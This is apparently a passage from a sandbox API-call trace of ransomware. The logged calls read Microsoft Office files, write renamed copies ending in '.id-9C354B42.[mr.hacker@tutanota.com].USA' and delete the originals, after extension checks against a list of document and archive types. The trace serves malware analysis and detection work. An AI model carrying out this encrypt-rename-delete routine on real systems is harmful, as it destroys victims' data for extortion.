lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.089] lstrlenW (lpString=".xlsx") returned 5 [0041.089] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.089] lstrlenW (lpString=".ppt") returned 4 [0041.089] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.089] lstrlenW (lpString=".zip") returned 4 [0041.089] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.089] lstrlenW (lpString=".rar") returned 4 [0041.089] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.089] lstrlenW (lpString=".bz2") returned 4 [0041.089] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.089] lstrlenW (lpString=".7z") returned 3 [0041.089] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.089] lstrlenW (lpString=".dbf") returned 4 [0041.089] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.089] lstrlenW (lpString=".1cd") returned 4 [0041.089] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.089] lstrlenW (lpString=".jpg") returned 4 [0041.089] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.090] lstrlenW (lpString=".doc") returned 4 [0041.090] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.090] lstrlenW (lpString=".docx") returned 5 [0041.090] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.090] lstrlenW (lpString=".pdf") returned 4 [0041.090] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.090] lstrlenW (lpString=".xls") returned 4 [0041.090] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.090] lstrlenW (lpString=".xlsx") returned 5 [0041.090] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.090] lstrlenW (lpString=".ppt") returned 4 [0041.090] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.090] lstrlenW (lpString=".zip") returned 4 [0041.090] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.090] lstrlenW (lpString=".rar") returned 4 [0041.090] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.090] lstrlenW (lpString=".bz2") returned 4 [0041.090] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.090] lstrlenW (lpString=".7z") returned 3 [0041.090] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.090] lstrlenW (lpString=".dbf") returned 4 [0041.090] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.090] lstrlenW (lpString=".1cd") returned 4 [0041.090] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.090] lstrlenW (lpString=".jpg") returned 4 [0041.090] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.091] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.091] lstrlenW (lpString="SETUP.XML") returned 9 [0041.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.525] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=31094) returned 1 [0041.525] CloseHandle (hObject=0x170) returned 1 [0041.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 0x20 [0041.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.535] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0041.542] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.542] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.544] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0041.571] GetLastError () returned 0x0 [0041.571] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x7976, lpOverlapped=0x0) returned 1 [0041.573] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x7980, lpOverlapped=0x0) returned 1 [0041.575] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.575] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.575] SetEndOfFile (hFile=0x160) returned 1 [0041.575] CloseHandle (hObject=0x160) returned 1 [0041.576] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.576] SetEndOfFile (hFile=0x1f0) returned 1 [0041.577] CloseHandle (hObject=0x1f0) returned 1 [0041.577] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.577] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 1 [0041.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.577] lstrlenW (lpString=".doc") returned 4 [0041.577] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.577] lstrlenW (lpString=".docx") returned 5 [0041.577] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.578] lstrlenW (lpString=".pdf") returned 4 [0041.578] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.578] lstrlenW (lpString=".xls") returned 4 [0041.578] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.578] lstrlenW (lpString=".xlsx") returned 5 [0041.578] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.578] lstrlenW (lpString=".ppt") returned 4 [0041.578] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.578] lstrlenW (lpString=".zip") returned 4 [0041.578] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.578] lstrlenW (lpString=".rar") returned 4 [0041.578] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.578] lstrlenW (lpString=".bz2") returned 4 [0041.578] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.578] lstrlenW (lpString=".7z") returned 3 [0041.578] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.578] lstrlenW (lpString=".dbf") returned 4 [0041.578] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.578] lstrlenW (lpString=".1cd") returned 4 [0041.578] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.578] lstrlenW (lpString=".jpg") returned 4 [0041.578] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.578] lstrlenW (lpString=".doc") returned 4 [0041.578] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.578] lstrlenW (lpString=".docx") returned 5 [0041.578] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.578] lstrlenW (lpString=".pdf") returned 4 [0041.578] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.578] lstrlenW (lpString=".xls") returned 4 [0041.579] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.579] lstrlenW (lpString=".xlsx") returned 5 [0041.579] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.579] lstrlenW (lpString=".ppt") returned 4 [0041.579] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.579] lstrlenW (lpString=".zip") returned 4 [0041.579] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.579] lstrlenW (lpString=".rar") returned 4 [0041.579] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.579] lstrlenW (lpString=".bz2") returned 4 [0041.579] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.579] lstrlenW (lpString=".7z") returned 3 [0041.579] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.579] lstrlenW (lpString=".dbf") returned 4 [0041.579] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.579] lstrlenW (lpString=".1cd") returned 4 [0041.579] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0041.579] lstrlenW (lpString=".jpg") returned 4 [0041.579] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.579] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.579] lstrlenW (lpString="TIME.XML") returned 8 [0041.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0041.580] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=8564) returned 1 [0041.580] CloseHandle (hObject=0x1f0) returned 1 [0041.580] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 0x20 [0041.580] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.580] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0041.580] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.580] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.580] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0041.580] GetLastError () returned 0x0 [0041.581] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x2174, lpOverlapped=0x0) returned 1 [0041.582] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x2180, lpOverlapped=0x0) returned 1 [0041.583] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.583] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe4, lpOverlapped=0x0) returned 1 [0041.583] SetEndOfFile (hFile=0x160) returned 1 [0041.583] CloseHandle (hObject=0x160) returned 1 [0041.584] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.584] SetEndOfFile (hFile=0x1f0) returned 1 [0041.585] CloseHandle (hObject=0x1f0) returned 1 [0041.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.585] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 1 [0041.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.585] lstrlenW (lpString=".doc") returned 4 [0041.585] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.585] lstrlenW (lpString=".docx") returned 5 [0041.585] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0041.585] lstrlenW (lpString=".pdf") returned 4 [0041.585] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.585] lstrlenW (lpString=".xls") returned 4 [0041.585] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.585] lstrlenW (lpString=".xlsx") returned 5 [0041.585] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0041.585] lstrlenW (lpString=".ppt") returned 4 [0041.585] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.586] lstrlenW (lpString=".zip") returned 4 [0041.586] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.586] lstrlenW (lpString=".rar") returned 4 [0041.586] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.586] lstrlenW (lpString=".bz2") returned 4 [0041.586] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.586] lstrlenW (lpString=".7z") returned 3 [0041.586] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.586] lstrlenW (lpString=".dbf") returned 4 [0041.586] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.586] lstrlenW (lpString=".1cd") returned 4 [0041.586] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.586] lstrlenW (lpString=".jpg") returned 4 [0041.586] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.586] lstrlenW (lpString=".doc") returned 4 [0041.586] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.586] lstrlenW (lpString=".docx") returned 5 [0041.586] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0041.586] lstrlenW (lpString=".pdf") returned 4 [0041.586] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.586] lstrlenW (lpString=".xls") returned 4 [0041.586] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.586] lstrlenW (lpString=".xlsx") returned 5 [0041.586] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0041.586] lstrlenW (lpString=".ppt") returned 4 [0041.586] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.586] lstrlenW (lpString=".zip") returned 4 [0041.586] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.587] lstrlenW (lpString=".rar") returned 4 [0041.587] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.587] lstrlenW (lpString=".bz2") returned 4 [0041.587] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.587] lstrlenW (lpString=".7z") returned 3 [0041.587] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.587] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.587] lstrlenW (lpString=".dbf") returned 4 [0041.587] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.587] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.587] lstrlenW (lpString=".1cd") returned 4 [0041.587] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.587] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.587] lstrlenW (lpString=".jpg") returned 4 [0041.587] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.587] lstrcmpiW (lpString1=".XSL", lpString2=".USA") returned 1 [0041.587] lstrlenW (lpString="BASMLA.XSL") returned 10 [0041.587] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0041.587] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=227311) returned 1 [0041.587] CloseHandle (hObject=0x1f0) returned 1 [0041.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 0x20 [0041.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0041.588] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.588] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0041.588] GetLastError () returned 0x0 [0041.588] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x377ef, lpOverlapped=0x0) returned 1 [0041.594] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x377f0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x377f0, lpOverlapped=0x0) returned 1 [0041.598] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.598] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe8, lpOverlapped=0x0) returned 1 [0041.598] SetEndOfFile (hFile=0x160) returned 1 [0041.598] CloseHandle (hObject=0x160) returned 1 [0041.601] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.601] SetEndOfFile (hFile=0x1f0) returned 1 [0041.603] CloseHandle (hObject=0x1f0) returned 1 [0041.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.603] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 1 [0041.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 